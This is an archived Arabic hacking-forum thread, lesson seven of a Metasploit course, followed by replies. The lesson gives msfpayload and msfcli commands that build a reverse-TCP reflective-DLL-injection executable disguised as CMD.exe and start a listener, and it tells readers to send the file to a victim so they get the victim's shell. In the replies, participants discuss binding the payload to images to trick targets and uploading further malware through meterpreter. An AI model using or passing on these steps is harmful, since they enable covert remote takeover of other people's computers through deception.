:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   MetaSploit (http://www.vbspiders.com/vb/f196.html)
-   -   [الدرس السابع] صناعة بايلود الـ reflectivedllinject (http://www.vbspiders.com/vb/t21843.html)

المجهووول 11-05-2009 11:14 PM

[الدرس السابع] صناعة بايلود الـ reflectivedllinject
 
بسم الله الرحمن الرحيم
السلام عليكم ورحمة الله وبركاتة
ادري طولت عليكم لكن لا تآخذوني ظروف ومشاغل
الله بعين
اليوم رجعت لكم وبدرس عن صناعة بايلود reflectivedllinject وتستخدم في دوس الضحية وللعلم للي يعرف بأوامر الدوس رح يبدع فيه ومن اوامرها نقل او تحميل ملف من النت وتشغيله او نقله مش متذكر تمام لكن يساعدك كثير
للعلم هي لا تختلف عن ساتبقتها وانما شبيهة بها تمام مجرد تغيير اسم البايلود
نبدأ بفتح دوس الميتا سبلويت من الوندوز ابدأ \\ البرامج \\ metasploit 3 \\ CMD shell
نضع الأمر هذا
كود PHP:

ruby msfpayload windows/reflectivedllinject/reverse_tcp LHOST=192.168.1.2 LPORT=9999 X >"C:\"CMD.exe 

الآن رح ينصنع بايلود ورح يكون في المسار C بجهازك بأسم ملف تنفيذي CMD.exe
الآن نيجي للأمر التالي وهو التصنت
بالامر
كود PHP:

ruby msfcli multi/handler PAYLOAD=windows/reflectivedllinject/reverse_tcp LHOST=192.168.1.2 LPORT=9999 E 

الاوامر كلها مرت معك بالدرس السابق لكن نشرحها ع السريع
msfcli لأستخدام ثغرة مباشرة
multi/handler ثغرة التصنت
PAYLOAD اسم البايلود المستخدم
LHOST اي بي جهازك
LPORT بورت مفتوح بجهازك لأستخدامه للتصنت
E للأستغلال اختصار ل Exploit
الآن ترسل الملف بأي طريقة وبعد ارساله وفتحه من قبل الضحية رح يتفتح لك دوس الضحية
واي شيء غير مفهوم ارجوا مراجعتي
#####
تحياتي
لا للاحتكار
المجهوول

KaLa$nikoV 11-05-2009 11:45 PM

يسلمو يا مبدع

والله انك كبير

يسلمو ع الدرس والله انا هذا الي ناقصني بالميتا
:)

Cr4ck3r 11-06-2009 12:59 AM

والله وحش هذي الدروس الي تفتح النفس ولا بلاش

تحياتيـ

المجهووول 11-06-2009 11:46 AM

يسلمو شباب
الله يخليك
ما كبير غير الله
نورت الموضوع شباب
تحياتي
لا للاحتكار
المجهوول

Flash 11-06-2009 06:36 PM

ما شاء الله ابدااااااااااااااااااااااااااااع

بس عاوز اسالك سؤال خيو

انا الميتا 3.3 ما رضيت تتحدث عندى وتشتغل ياريت تفيدنى

لشان انا بحب تهكير الميتا هههه

ومشكور كتير على الدرس الرائع

المجهووول 11-06-2009 08:08 PM

بالنسبة لي لم اجرب التحديث
فلذلك اذا لم ينجح معك التحديث فحملها
وان شاء الله تجربها
###
تحياتي
لا للاحتكار
المجهوول

Cr4ck3r 11-06-2009 09:25 PM

حبيبي بس سؤال
الحين انت ف الأمر الأول سويت تكوين ملف على مسار السي
C:\"CMD.exe

وقلت انو نرسله للضحية عشان يتم الإختراق
طيب السؤال هل ممكن نغير الأمتداد لصورة أو غيرها
أو ندمجه مع صوره عن طريق برامج الدمج
منتظر ردك

المجهووول 11-07-2009 12:46 PM

اكيد تدمجه او تغيره مثل ما تريد وفي دروس عن ثغرات متصفح تسوي الامتداد مثل ما تريد والشرح بالمنتديات موجود

ابو بدر 11-08-2009 09:48 PM

مشكوووووور
فينك يامجهوول
افتكرت الدورة خلصت
واصل ابدااعااتك
وننتظر الدرس القادم

gr-group 11-11-2009 06:11 PM

شرح سهل يا اخي لكن انا وقعت في مشكله مع البايلود meterpreter
لما اخترقت الضحيه وجيت ارفع سرفر من قرص ال d من جهازي الي جهازي جابلي error :)
وكان الامر ال استعملته upload d:\server.exe
لما جاني هذا الخطأ

المجهووول 11-12-2009 03:42 PM

مشكور الجميع وترقبوا القادم
بالنسبة للأخ قروب اكيد الخطأ رح ييجي لأن الأمر غير صحيح
يجب تحديد المسار الذي تريد رفعه عليه
يعني لو فمكرت فيها انت لما بعد رفع الملف اين سيكون ؟؟
اذا الأمر سيكون هكذا
upload D:\server.exe C:\
###
تحياتي
لا للاحتكار
المجهوول

ThE BiGeSt JoKeR 11-13-2009 04:44 PM

مشكووووووور يا بطل

دروسك صراحه راائعه مثلك

رائع و على راااسي يا كبييير

بانتظااااار الدرس الثامن

و اخي اذا تبي اساعدك في اي شيء في الدرووس انا مستعد

يعني تحتخدمتك في اي وقت اذا تيني موجود 18 ساعه يإذن الله في الشبكه


سلامز و الى الامام يا بطل

دعواتي لك

المجهووول 11-16-2009 10:18 PM

تسلم يا غالي
انا اضفتك نتلاقي بالميل

D-GhosT s3cur!Ty-Z 03-25-2010 09:29 PM

شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية . شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية .

ouTLaw 11-26-2010 08:00 PM

بارك الله فيك


الساعة الآن 05:05 PM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0